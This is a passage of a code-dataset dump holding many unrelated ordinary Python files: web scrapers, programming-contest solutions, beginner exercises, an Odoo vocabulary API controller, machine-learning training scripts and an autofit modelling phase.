int(stat_array[0].span.text.strip('.')) #position\n name = stat_array[3].a.text.split(',')\n first_name = name[1]\n last_name = name[0]\n profile[0] = str(first_name + last_name) #name\n profile[5] = stat_array[4].span.text #nationality\n if stat_array[5] is not None or len(stat_array[5]) > 0:\n profile[4] = stat_array[5].text #age\n profile[2] = float(stat_array[8].text) #points\n\n profile_str = ', '.join(str(x) for x in profile)\n print('PROFILE STRING (FROM TABLE): ' + profile_str)\n f.write(profile_str)\n\n #start new line for new rider profile\n f.write(\"\\n\")\n\n loop_counter += 1\n\n # # wait for table to appear\n # WebDriverWait(driver, 10).until(\n # EC.visibility_of_element_located((By.CSS_SELECTOR, \".pagination\"))\n # )\n # navigate to link\n try:\n page_next = driver.find_element_by_class_name('next')\n page_next.click()\n except:\n driver.execute_script(\"window.history.go(-1)\")\n page_next = driver.find_element_by_class_name('next')\n page_next.click()\n\nf.close() # Close the file\ndriver.quit()","sub_path":"shredstats_scraper_all.py","file_name":"shredstats_scraper_all.py","file_ext":"py","file_size_in_byte":13132,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"602991054","text":"n = int(input())\na = [int(x) for x in input().split()]\n\ny = []\nfor s, t in zip(a, a[1:]):\n if abs(s - t) != 1 and s != t:\n y.append(abs(s - t))\ny.append(1)\ny = y[0]\n\nfor s, t in zip(a, a[1:]):\n if not(abs(s - t) == y or (abs(s - t) == 1 and min(s, t) % y != 0)):\n break\nelse:\n print(\"YES\")\n print(\"{} {}\".format(10**9, y))\n exit()\n\nprint(\"NO\")\n","sub_path":"Codeforces/954C.py","file_name":"954C.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"520911128","text":"import sys\nsys.stdin = open(\"input.txt\")\n\nT = int(input())\n\nfor tc in range(1, T+1):\n str1 = list(map(int,input()))\n N = len(str1)\n str2 = [0]*N #0으로 채워진 리스트를 한개 만들어줌\n\n # print(str1)\n # print(str2)\n cnt = 0\n\n for i in range(N):\n if str2[i] == str1[i]:\n continue\n elif str2[i] != str1[i]: #같지 않다면 str1의 인덱스 i번째 값으로 끝까지 채운다\n cnt += 1\n j = i\n for j in range(N):\n str2[j] = str1[i]\n\n #print(str2)\n\n\n print(\"#{} {}\".format(tc,cnt))\n\n","sub_path":"SWEA/1289_원재의메모리복구/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"510657148","text":"# create a tuple named zoo\nzoo = ('zebra', 'elephant', 'flamingo', 'camel', 'polarbear')\n\n# find animal using index\nprint(zoo.index('flamingo'))\n\n# determine if animal is in tuple\nanimal = []\n\ndef find(animal):\n for value in zoo:\n if animal in zoo:\n print(f'{animal} is currently at the Zoo.')\n else:\n print(f'{animal} is not at the Zoo.')\n\nfind('flamingo')\nfind('lion')\n\n# create variable for each animal\n(zebra, elephant, flamingo, camel, polarbear) = zoo\nprint(elephant)\n\n# convert tuple to list\nzoo_list = list(zoo)\nprint(zoo_list)\n\n# use extend to add 3 animals\nzoo_list.extend(['kitty', 'cardinal', 'dolphin'])\nprint(zoo_list)\n\n# convert list back to tuple\nprint(tuple(zoo_list))","sub_path":"tuples/zoo.py","file_name":"zoo.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"289767598","text":"from odoo import http, tools\nfrom odoo.http import request\nfrom bs4 import BeautifulSoup\nimport werkzeug\nimport requests\nimport logging\nimport json\n\n_logger = logging.getLogger(__name__)\n\n\nclass WechatEnglishController(http.Controller):\n\n @http.route('/api/v2/wechat_english', type='json', auth=\"user\")\n def wechat_category(self, key, **kw):\n result_list = []\n user_id = request.env.user.id\n word_lexicon = request.env['english.lexicon']\n user_word = request.env['english.lexicon.user.master']\n word_list = word_lexicon.sudo().search([\n \"|\",\n (\"word\", \"ilike\", key),\n (\"chinese_mean\", \"ilike\", key)])\n for word in word_list:\n is_added = False\n user_master = user_word.sudo().search([('english_lexicon_id', '=', word.id), ('user_id', '=', user_id)], limit=1)\n if user_master:\n is_added = True\n word_voice_url = word_lexicon.sudo().get_word_voice_url(word.id)\n result = {\"id\": word.id,\n \"word\": word.word,\n \"chinese_mean\": word.chinese_mean,\n \"british_accent\": word.british_accent,\n \"source_name\": word.source_name,\n \"sequence\": word.sequence,\n \"forms\": word.forms,\n \"is_added\": is_added,\n \"voice_url\": word_voice_url,\n }\n defintion_list = []\n special_defintion_word = {\n \"order\": 0,\n \"gram\": \"\",\n \"english_mean\": word.chinese_mean,\n \"chinese_mean\": \"\",\n \"synonymous\": word.forms,\n \"sentence_list\": []\n }\n defintion_list.append(special_defintion_word)\n\n for defintion in word.lexicon_explain_ids:\n defintion_word = {\n \"order\": defintion.order,\n \"gram\": defintion.gram,\n \"english_mean\": defintion.english_mean,\n \"chinese_mean\": defintion.chinese_mean,\n \"synonymous\": defintion.synonymous,\n }\n sentence_list = []\n for example in defintion.lexicon_explain_example_ids:\n sentences = {\n \"order\": example.order,\n \"example\": example.sentence,\n }\n sentence_list.append(sentences)\n defintion_word[\"sentence_list\"] = sentence_list\n\n defintion_list.append(defintion_word)\n\n result[\"defintion_list\"] = defintion_list\n result_list.append(result)\n return result_list\n\n @http.route('/api/v2/wechat_english_level', type='json', auth=\"user\")\n def get_word_level_list(self, **kwargs):\n return request.env['english.lexicon.master.level'].sudo().get_all_level()\n\n @http.route('/api/v2/wechat_english_save', type='json', auth=\"user\")\n def get_word_level_save(self, word_id, level_id, **kwargs):\n result = {'is_success': True}\n user_id = request.env.user.id\n try:\n request.env['english.lexicon.user.master'].sudo()\\\n .save_user_word(word_id, user_id, level_id)\n except Exception:\n result['is_success'] = False\n return result\n\n @http.route('/api/v2/get_word_id', type='http', auth=\"none\", csrf=False)\n def get_word_id(self, word, **kwargs):\n result = {'id': 0}\n request.session.db = \"Odoo_Project\"\n word_list = request.env['english.lexicon'].sudo().search([\n (\"word\", \"=\", word)], limit=1)\n if word_list:\n result[\"id\"] = word_list.id\n return json.dumps(result)\n\n @http.route('/api/v2/delete_word_id', type='http', auth=\"none\", csrf=False)\n def delete_word_id(self, **kwargs):\n request.session.db = \"Odoo_Project\"\n result = request.env['english.lexicon'].sudo().delete_attachment()\n return json.dumps(result)\n\n @http.route('/api/v2/wechat_level_words', type='json', auth=\"user\")\n def get_level_words(self, level_id, page_index, page_size, **kw):\n result = {'is_success': True}\n user_id = request.env.user.id\n try:\n data = request.env['english.lexicon.user.master'].sudo()\\\n .get_my_level_words(level_id, user_id, page_index, page_size)\n result['data'] = data\n except Exception as e:\n result['is_success'] = False\n result['info'] = tools.ustr(e)\n return result\n\n @http.route('/api/v2/wechat_insert_my_words', type='json', auth=\"user\")\n def insert_my_level_words(self, **kw):\n result = {'is_success': True}\n try:\n request.env['english.lexicon.user.master'].sudo().insert_my_words()\n except Exception as e:\n result['is_success'] = False\n result['info'] = tools.ustr(e)\n return result\n","sub_path":"wechat_mini_programs/controllers/wechat_english_controller.py","file_name":"wechat_english_controller.py","file_ext":"py","file_size_in_byte":4997,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"380974398","text":"# -*- coding:utf-8 -*-\n# 作者 :JunFengG\n# 创建时间 :2018/10/1 0001 16:53 \n# 文件 :UseTimeSeries\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom TimeSeries import convert_data_to_timeseries\n\n\ninput_file='data_timeseries.txt'\n\n#加载数据\ndata1=convert_data_to_timeseries(input_file,2)\ndata2=convert_data_to_timeseries(input_file,3)\n\n#转换为pandas数据帧\ndataframe=pd.DataFrame({'first':data1,'second':data2})\n\n#给定年份数据\ndataframe['1952':'1955'].plot()\nplt.title('First')\n\n\n#画出不同数据\nplt.figure()\ndifference=dataframe['1952':'1955']['first']-dataframe['1952':'1955']['second']\ndifference.plot()\nplt.title('Difference')\n\n#数据过滤\ndataframe[(dataframe['first']>60)&(dataframe['second']<20)].plot()\nplt.title('Selected')\n\nplt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"PythonMechineLearningCookbook/Chapter08/UseTimeSeries.py","file_name":"UseTimeSeries.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"513245474","text":"\"\"\"\nYou're given a dictionary of people and the number of games they've won.\n\nUse a for loop to iterate over the dictionary and print out the users name and how many games they've won in the\nfollowing format: sara has won n games\n\nTo make it human readable, pluralise the word game to suit the number of games won.\n\"\"\"\n\ngames_won = dict(sara=0, bob=1, tim=5, julian=3, jim=1)\n\n\ndef print_game_stats(games_won=games_won):\n \"\"\"Loop through games_won's dict (key, value) pairs (dict.items)\n printing (print, not return) how many games each person has won,\n pluralize 'game' based on number.\n\n Expected output (ignore the docstring's indentation):\n\n sara has won 0 games\n bob has won 1 game\n tim has won 5 games\n julian has won 3 games\n jim has won 1 game\n\n (Note that as of Python 3.7 - which we're using atm - dict insert order is retained\n so no sorting is required for this Bite.)\n \"\"\"\n for key in games_won:\n plural = \"game\"\n if games_won[key] != 1:\n plural = \"games\"\n print(\"{0} has won {1} {2}\".format(key, games_won[key], plural))\n\nprint_game_stats(games_won)","sub_path":"python/plurals.py","file_name":"plurals.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"425045363","text":"# -*- coding:utf-8 -*-\n\nimport requests\n\nproxies = {\n \"http\": \"http://10.10.1.10:3128\",\n \"https\": \"http://10.10.1.10:1080\",\n}\n\n\ndef get(url):\n '''\n @summary: 网络请求\n '''\n return requests.get(url, proxies=proxies)\n\n\nif __name__ == '__main__':\n print(get('http://www.baidu.com'))\n","sub_path":"proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"598474503","text":"import pandas as pd\n\nfrom time import time\nfrom sklearn.model_selection import cross_val_score, StratifiedKFold\n\nfrom twitter.models.word2vec_model import build_model\n# from models.baseline_model import build_model\n\nimport logging\n\n\ndef main():\n logging.basicConfig(level=logging.DEBUG)\n\n df = pd.read_csv('data/Tweets.csv')\n X = df['text'].values\n y = df['airline_sentiment']\n y = y.map({'negative': -1, 'neutral': 0, 'positive': 1}).values\n\n model = build_model(n_dim=25)\n\n t0 = time()\n\n # using determined test_splits for smart dump/load\n cv = StratifiedKFold(n_splits=3, random_state=42)\n scores = cross_val_score(model, X, y, cv=cv)\n\n score = scores.mean()\n std = scores.std()\n print(\"Score: %.4f +- %.4f\" % (score, std))\n print(\"Total done in %0.3fs\" % (time() - t0))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"twitter/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"246335194","text":"import json\nimport re\n\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom decimal import Decimal\n\nfrom bs4 import BeautifulSoup\n\nfrom storescraper.product import Product\nfrom storescraper.store import Store\nfrom storescraper.utils import html_to_markdown, remove_words, \\\n session_with_proxy\n\n\nclass Todoclick(Store):\n @classmethod\n def categories(cls):\n return [\n 'AllInOne',\n 'Notebook',\n 'StorageDrive',\n 'SolidStateDrive',\n 'ExternalStorageDrive',\n 'PowerSupply',\n 'ComputerCase',\n 'Motherboard',\n 'Processor',\n 'VideoCard',\n 'Ram',\n 'Tablet',\n 'Headphones',\n 'Mouse',\n 'Keyboard',\n 'Monitor',\n 'Printer',\n 'UsbFlashDrive',\n 'StereoSystem',\n 'Wearable',\n ]\n\n @classmethod\n def discover_urls_for_category(cls, category, extra_args=None):\n category_paths = [\n ['notebooks', 'Notebook'],\n ['all-in-one', 'AllInOne'],\n ['disco-duro', 'StorageDrive'],\n ['fuentes-de-poder', 'PowerSupply'],\n ['gabinetes', 'ComputerCase'],\n ['placa-madre', 'Motherboard'],\n ['procesadores', 'Processor'],\n ['tarjetas-de-video', 'VideoCard'],\n ['memoria-ram', 'Ram'],\n ['tablet', 'Tablet'],\n ['audifonos', 'Headphones'],\n ['audifonos-gamer', 'Headphones'],\n ['mouse-accesorios', 'Mouse'],\n ['mouse-gamer', 'Mouse'],\n ['teclados', 'Keyboard'],\n ['teclado-gamer', 'Keyboard'],\n ['monitores', 'Monitor'],\n ['impresoras-laser-impresoras', 'Printer'],\n ['impresoras-ink-jet-impresoras', 'Printer'],\n ['multifuncional-laser', 'Printer'],\n ['multifuncional-ink-jet', 'Printer'],\n ['pendrive', 'UsbFlashDrive'],\n ['parlantes', 'StereoSystem'],\n ['soundbar', 'StereoSystem'],\n ['smartwatch', 'Wearable']\n ]\n\n session = session_with_proxy(extra_args)\n product_urls = []\n\n for category_path, local_category in category_paths:\n if local_category != category:\n continue\n\n page = 1\n\n while True:\n if page >= 15:\n raise Exception('Page overflow')\n\n if page == 1:\n page_url = 'https://todoclick.cl/{}/'.format(category_path)\n else:\n page_url = 'https://todoclick.cl/{}/page/{}/'\\\n .format(category_path, page)\n\n soup = BeautifulSoup(session.get(page_url).text, 'html.parser')\n products = soup.findAll('li', 'product')\n\n if not products:\n break\n\n for product in products:\n product_urls.append(product.find('a')['href'])\n\n page += 1\n\n return product_urls\n\n @classmethod\n def products_for_url(cls, url, category=None, extra_args=None):\n print(url)\n session = session_with_proxy(extra_args)\n response = session.get(url)\n soup = BeautifulSoup(response.text, 'html5lib')\n\n name = soup.find('h1', 'product_title').text\n sku = soup.find('div', 'ct-code-block').text.split(':')[1].strip()\n\n stock = 0\n stock_container = soup.find('p', 'stock in-stock')\n if stock_container:\n stock = int(stock_container.text.split(' ')[0])\n\n offer_price_container = soup.find('p', 'price')\n\n if offer_price_container.find('ins'):\n offer_price_container = offer_price_container.find('ins')\n\n offer_price = Decimal(offer_price_container.find('span', 'amount')\n .text.replace('$', '').replace('.', ''))\n normal_price = Decimal(soup.find('div', {'id': 'Webpay'})\n .text.split('$')[1].replace('.', ''))\n\n images = soup.findAll('img', 'wp-post-image')\n picture_urls = [i['src'] for i in images]\n\n description = html_to_markdown(\n str(soup.find('div', {'id': 'tab-description'})))\n\n p = Product(\n name,\n cls.__name__,\n category,\n url,\n url,\n sku,\n stock,\n normal_price,\n offer_price,\n 'CLP',\n sku=sku,\n part_number=sku,\n picture_urls=picture_urls,\n description=description\n )\n\n return [p]\n","sub_path":"storescraper/stores/todoclick.py","file_name":"todoclick.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"572105773","text":"# Classic knapsack problem, memoized\r\n# Each item has a weight w_i and a value v_i. The knapsack can only take up to\r\n# weight W\r\ndef memoize(f):\r\n memo = {}\r\n\r\n # internal function\r\n def helper(*args):\r\n if args not in memo:\r\n memo[args] = f(*args)\r\n return memo[args]\r\n\r\n return helper\r\n\r\ndef knapsack(items, max_weight):\r\n # no more items/ none to choose from\r\n if len(items) == 0:\r\n return 0\r\n\r\n @memoize\r\n def knapsack_best_value(n, max_w):\r\n if n == 0:\r\n return 0\r\n\r\n value, weight = items[n-1]\r\n if weight > max_w:\r\n # can't add item, so skipping to next\r\n return knapsack_best_value(n-1,max_w)\r\n else:\r\n # choose best valued item, maximising over existing\r\n # value to new potential\r\n return max(knapsack_best_value(n-1,max_w-weight) + value,\r\n knapsack_best_value(n-1,max_w))\r\n\r\n j = max_weight\r\n result = []\r\n for i in range(len(items), 0, -1):\r\n if knapsack_best_value(i, j) != knapsack_best_value(i - 1, j):\r\n result.append(items[i - 1])\r\n j -= items[i - 1][1]\r\n result.reverse()\r\n\r\n # prints number of partial computations\r\n # print(\"Partial computations %d\" % len(bestvalue.cache))\r\n return knapsack_best_value(len(items), max_weight), result\r\n\r\nitems = [(4, 12), (2, 1), (6, 4), (1, 1), (2, 2)]\r\nprint(knapsack(items,15))\r\n","sub_path":"dp_problems/knapsack.py","file_name":"knapsack.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"30694993","text":"import torch, numpy, os, shutil, math, re, torchvision, argparse, warnings\nfrom netdissect import parallelfolder, renormalize, pbar\nfrom torchvision import transforms\nfrom torch.optim import Optimizer\n\ndef parseargs():\n parser = argparse.ArgumentParser()\n def aa(*args, **kwargs):\n parser.add_argument(*args, **kwargs)\n aa('--dataset', choices=['imagenet', 'novelty'], default='novelty')\n aa('--selected_classes', type=int, default=413)\n aa('--training_iterations', type=int, default=100001)\n args = parser.parse_args()\n return args\n\ndef main():\n args = parseargs()\n experiment_dir = 'results/baseline-%d-%s-resnet' % (\n args.selected_classes, args.dataset)\n ds_dirname = dict(\n novelty='novelty/dataset_v1/known_classes/images',\n imagenet='imagenet')[args.dataset]\n training_dir = 'datasets/%s/train' % ds_dirname\n val_dir = 'datasets/%s/val' % ds_dirname\n os.makedirs(experiment_dir, exist_ok=True)\n with open(os.path.join(experiment_dir, 'args.txt'), 'w') as f:\n f.write(str(args) + '\\n')\n def printstat(s):\n with open(os.path.join(experiment_dir, 'log.txt'), 'a') as f:\n f.write(str(s) + '\\n')\n pbar.print(s)\n def filter_tuple(item):\n return item[1] < args.selected_classes\n # Imagenet has a couple bad exif images.\n warnings.filterwarnings('ignore', message='.*orrupt EXIF.*')\n # Here's our data\n train_loader = torch.utils.data.DataLoader(\n parallelfolder.ParallelImageFolders([training_dir],\n classification=True,\n filter_tuples=filter_tuple,\n transform=transforms.Compose([\n transforms.Resize(256),\n transforms.RandomCrop(224),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n renormalize.NORMALIZER['imagenet'],\n ])),\n batch_size=64, shuffle=True,\n num_workers=48, pin_memory=True)\n val_loader = torch.utils.data.DataLoader(\n parallelfolder.ParallelImageFolders([val_dir],\n classification=True,\n filter_tuples=filter_tuple,\n transform=transforms.Compose([\n transforms.Resize(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n renormalize.NORMALIZER['imagenet'],\n ])),\n batch_size=64, shuffle=False,\n num_workers=24, pin_memory=True)\n late_model = torchvision.models.resnet50(num_classes=args.selected_classes)\n for n, p in late_model.named_parameters():\n if 'bias' in n:\n torch.nn.init.zeros_(p)\n elif len(p.shape) <= 1:\n torch.nn.init.ones_(p)\n else:\n torch.nn.init.kaiming_normal_(p, nonlinearity='relu')\n late_model.train()\n late_model.cuda()\n\n model = late_model\n\n max_lr = 5e-3\n max_iter = args.training_iterations\n criterion = torch.nn.CrossEntropyLoss().cuda()\n optimizer = torch.optim.Adam(model.parameters())\n scheduler = torch.optim.lr_scheduler.OneCycleLR(optimizer, max_lr,\n total_steps=max_iter - 1)\n iter_num = 0\n best = dict(val_accuracy=0.0)\n # Oh, hold on. Let's actually resume training if we already have a model.\n checkpoint_filename = 'weights.pth'\n best_filename = 'best_%s' % checkpoint_filename\n best_checkpoint = os.path.join(experiment_dir, best_filename)\n try_to_resume_training = False\n if try_to_resume_training and os.path.exists(best_checkpoint):\n checkpoint = torch.load(os.path.join(experiment_dir, best_filename))\n iter_num = checkpoint['iter']\n model.load_state_dict(checkpoint['state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer'])\n scheduler.load_state_dict(checkpoint['scheduler'])\n best['val_accuracy'] = checkpoint['accuracy']\n\n def save_checkpoint(state, is_best):\n filename = os.path.join(experiment_dir, checkpoint_filename)\n os.makedirs(os.path.dirname(filename), exist_ok=True)\n torch.save(state, filename)\n if is_best:\n shutil.copyfile(filename,\n os.path.join(experiment_dir, best_filename))\n\n def validate_and_checkpoint():\n model.eval()\n val_loss, val_acc = AverageMeter(), AverageMeter()\n for input, target in pbar(val_loader):\n # Load data\n input_var, target_var = [d.cuda() for d in [input, target]]\n # Evaluate model\n with torch.no_grad():\n output = model(input_var)\n loss = criterion(output, target_var)\n _, pred = output.max(1)\n accuracy = (target_var.eq(pred)\n ).data.float().sum().item() / input.size(0)\n val_loss.update(loss.data.item(), input.size(0))\n val_acc.update(accuracy, input.size(0))\n # Check accuracy\n pbar.post(l=val_loss.avg, a=val_acc.avg)\n # Save checkpoint\n save_checkpoint({\n 'iter': iter_num,\n 'state_dict': model.state_dict(),\n 'optimizer' : optimizer.state_dict(),\n 'scheduler' : scheduler.state_dict(),\n 'accuracy': val_acc.avg,\n 'loss': val_loss.avg,\n }, val_acc.avg > best['val_accuracy'])\n best['val_accuracy'] = max(val_acc.avg, best['val_accuracy'])\n printstat('Iteration %d val accuracy %.2f' %\n (iter_num, val_acc.avg * 100.0))\n\n # Here is our training loop.\n while iter_num < max_iter:\n for filtered_input, filtered_target in pbar(train_loader):\n # Track the average training loss/accuracy for each epoch.\n train_loss, train_acc = AverageMeter(), AverageMeter()\n # Load data\n input_var, target_var = [d.cuda()\n for d in [filtered_input, filtered_target]]\n # Evaluate model\n output = model(input_var)\n loss = criterion(output, target_var)\n train_loss.update(loss.data.item(), filtered_input.size(0))\n # Perform one step of SGD\n if iter_num > 0:\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n # Learning rate schedule\n scheduler.step()\n # Also check training set accuracy\n _, pred = output.max(1)\n accuracy = (target_var.eq(pred)).data.float().sum().item() / (\n filtered_input.size(0))\n train_acc.update(accuracy)\n remaining = 1 - iter_num / float(max_iter)\n pbar.post(l=train_loss.avg, a=train_acc.avg,\n v=best['val_accuracy'])\n # Ocassionally check validation set accuracy and checkpoint\n if iter_num % 1000 == 0:\n validate_and_checkpoint()\n model.train()\n # Advance\n iter_num += 1\n if iter_num >= max_iter:\n break\n\nclass AverageMeter(object):\n \"\"\"Computes and stores the average and current value\"\"\"\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.val = 0\n self.avg = 0\n self.sum = 0\n self.count = 0\n\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\nif __name__ == '__main__':\n torch.backends.cudnn.benchmark = True\n main()\n","sub_path":"train_baseline_resnet.py","file_name":"train_baseline_resnet.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"148533611","text":"# Conjuntos são colecções desordenadas de elementos únicos.\n# Os elementos não são armazenados em uma ordem específica e confiável.\n# Conjuntos não contém elementos repetidos.\n\nprint('Loja Stars Wars')\n\npedidos_dia1 = [ \n {'Cliente': 'José', 'filme': 'A New Hope'},\n {'Cliente': 'José', 'filme': 'A New Hope'},\n {'Cliente': 'Francisco', 'filme': 'The Empire Strikes Back'},\n {'Cliente': 'Luis', 'filme': ' Revenge of the Sith'},\n]\n\n\npedidos_dia2 = [\n {'Cliente': 'Marco', 'filme': 'A New Hope'},\n {'Cliente': 'Nuno', 'filme': 'A New Hope'},\n {'Cliente': 'Carlos', 'filme': 'The Empire Strikes Back'},\n {'Cliente': 'Rodrigo', 'filme': ' Revenge of the Sith'}, \n]\n\nclientes_dia1 = set()\nfor pedido in pedidos_dia1:\n clientes_dia1.add(pedido['Cliente'])\n\nprint(f'Dia 1: {clientes_dia1}')\n\nclientes_dia2 = set()\nfor pedido in pedidos_dia2:\n clientes_dia2.add(pedido['Cliente'])\n\nprint(f'Dia 2: {clientes_dia2}')\n\ntodos_clientes = clientes_dia1 | clientes_dia2\nprint(f'União: {todos_clientes}')\n\ncliente_comprou_todos_os_dias = clientes_dia1.intersection(clientes_dia2)\nprint(f'Intersecão: {cliente_comprou_todos_os_dias}')\n\nclientes_diferenca = clientes_dia1 - clientes_dia2\nprint(f'Diferença: {clientes_diferenca}')","sub_path":"python_do_zero/conjuntos.py","file_name":"conjuntos.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"315135062","text":"import autofit as af\r\nfrom src.dataset.dataset import Dataset\r\nfrom src.phase.result import Result\r\nfrom src.phase.analysis import Analysis\r\nfrom src.phase.settings import SettingsPhase\r\n\r\n\"\"\"\r\nThe phase package combines a data-set, model and `NonLinearSearch`, allowing us to fit the `Dataset` with the model. It\r\nessentially acts as the `meeting point` between the other packages in the project (dataset, fit, plot) and modules\r\nin the phase package (phase.py, analysis.py, result.py).\r\n\"\"\"\r\n\r\n\r\nclass Phase(af.AbstractPhase):\r\n\r\n \"\"\"\r\n This tells the phase that the input parameter `profiles` contains model components that are fitted for by the\r\n phase`s `NonLinearSearch`.\r\n\r\n In `analysis.py`, the `log_likelihood_function`' input parameter `instance` contains the `profiles` mapped from\r\n this model via the `NonLinearSearch` (as we saw in chapter 1).\r\n\r\n For your model-fitting problem, this will be replaced by the modules in your `model` package.\r\n \"\"\"\r\n\r\n profiles = af.PhaseProperty(\"profiles\")\r\n\r\n Result = Result # Set the result to the Result class in `result.py`\r\n\r\n def __init__(\r\n self,\r\n search: af.NonLinearSearch, # <- This specifies the default `NonLinearSearch` used by the phase.\r\n settings: SettingsPhase, # <- Settings will be covered in detail in tutorial 3.\r\n profiles: list,\r\n ):\r\n \"\"\"\r\n A phase which fits a `Gaussian` model using a `NonLinearSearch`.\r\n\r\n Parameters\r\n ----------\r\n search: class\r\n The class of a non_linear search\r\n settings : SettingsPhase\r\n The collection of settings of the phase used to augment the data that is fitted and tag the output path.\r\n profiles : [profiles.Profile]\r\n The model components (e.g. Gaussian, Exponential) fitted by this phase.\r\n \"\"\"\r\n super().__init__(search=search)\r\n\r\n self.settings = settings\r\n self.profiles = profiles\r\n\r\n def run(self, dataset: Dataset, info=None) -> Result:\r\n \"\"\"\r\n Pass a `Dataset` to the phase, running the phase and `NonLinearSearch`.\r\n\r\n Parameters\r\n ----------\r\n dataset : `Dataset`.Dataset\r\n The `Dataset` fitted by the phase, which is specified in the module `dataset/dataset.py`\r\n\r\n Returns\r\n -------\r\n result: result.Result\r\n A result object comprising information on the `NonLinearSearch` and the maximum likelihood model.\r\n Tutorial 3 will cover phase tagging, which this function handles.\"\"\"\r\n self.modify_search_paths()\r\n\r\n \"\"\"\r\n These functions create instances of the Analysis class (in `analysis.py`), runs the analysis (which performs\r\n the `NonLinearSearch` ) and returns an instance of the Result class (in `result.py`).\r\n\r\n Once you`ve looked through this module, check those modules out to see exactly what these classes do!\r\n \"\"\"\r\n analysis = self.make_analysis(dataset=dataset)\r\n\r\n \"\"\"\r\n `run_analysis` is not located in analysis.py, instead it is an inherited method from the parent class\r\n `af.AbstractPhase`. Essentially, all this function does is begin the `NonLinearSearch`, using the analysis\r\n created above.\r\n \"\"\"\r\n result = self.run_analysis(analysis=analysis, info=info)\r\n\r\n return self.make_result(result=result, analysis=analysis)\r\n\r\n def make_analysis(self, dataset: Dataset) -> Analysis:\r\n \"\"\"\r\n Returns an Analysis object, which uses the `Dataset` with functions to perform a fit.\r\n\r\n Parameters\r\n ----------\r\n dataset : `Dataset`.Dataset\r\n The `Dataset` fitted by the phase, which is specified in the module `dataset/dataset.py`\r\n\r\n Returns\r\n -------\r\n analysis : Analysis\r\n An analysis object that the `NonLinearSearch` calls to determine the fit log_likelihood for a given model\r\n instance.\r\n \"\"\"\r\n dataset = dataset.trimmed_dataset_from_settings(\r\n settings=self.settings.settings_dataset\r\n )\r\n\r\n return Analysis(dataset=dataset, settings=self.settings)\r\n\r\n def make_result(self, result: af.Result, analysis: Analysis) -> Result:\r\n return self.Result(\r\n samples=result.samples,\r\n previous_model=self.model,\r\n search=self.search,\r\n analysis=analysis,\r\n )\r\n\r\n def modify_search_paths(self):\r\n \"\"\"\r\n Modify the output paths of the phase before the non-linear search is run, so that the output path can be\r\n customized using the tags of the phase.\r\n \"\"\"\r\n self.search.paths.tag = self.settings.tag\r\n","sub_path":"notebooks/howtofit/chapter_phase_api/src/phase/phase.py","file_name":"phase.py","file_ext":"py","file_size_in_byte":4724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"478712604","text":"a = (\"Процент\")\r\nb = (\"Процента\")\r\nc = (\"Процентов\")\r\nn = [i for i in range(1,101)]\r\nnumbs = {11,12,13,14}\r\nfor n in range(100):\r\n n = n + 1\r\n if n in numbs:\r\n print(n, \"процентов\")\r\n elif n % 10 == 1:\r\n print(n, \"процент\")\r\n elif n % 10 > 1 and n % 10 <5:\r\n print(n, \"процента\")\r\n else:\r\n print(n, \"процентов\")","sub_path":"Mironov_Mark_DZ_3.py","file_name":"Mironov_Mark_DZ_3.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"428763683","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport random\nimport scipy.misc\nfrom keras.preprocessing import image\nimport os\nimport subprocess\nimport easygui\nfrom PIL import Image\n\nDATA_DIR = \"./data\"\nTRAIN_DIR = os.path.join(DATA_DIR, \"train\")\nTEST_DIR = os.path.join(DATA_DIR, \"test\")\n\n# IMG_SHAPE = (64, 64)\n\n\n\ndef pixel_errors(input_S, input_C, decoded_S, decoded_C):\n \"\"\"Calculates mean of Sum of Squared Errors per pixel for cover and secret images. \"\"\"\n see_Spixel = np.sqrt(np.mean(np.square(255 * (input_S - decoded_S))))\n see_Cpixel = np.sqrt(np.mean(np.square(255 * (input_C - decoded_C))))\n\n return see_Spixel, 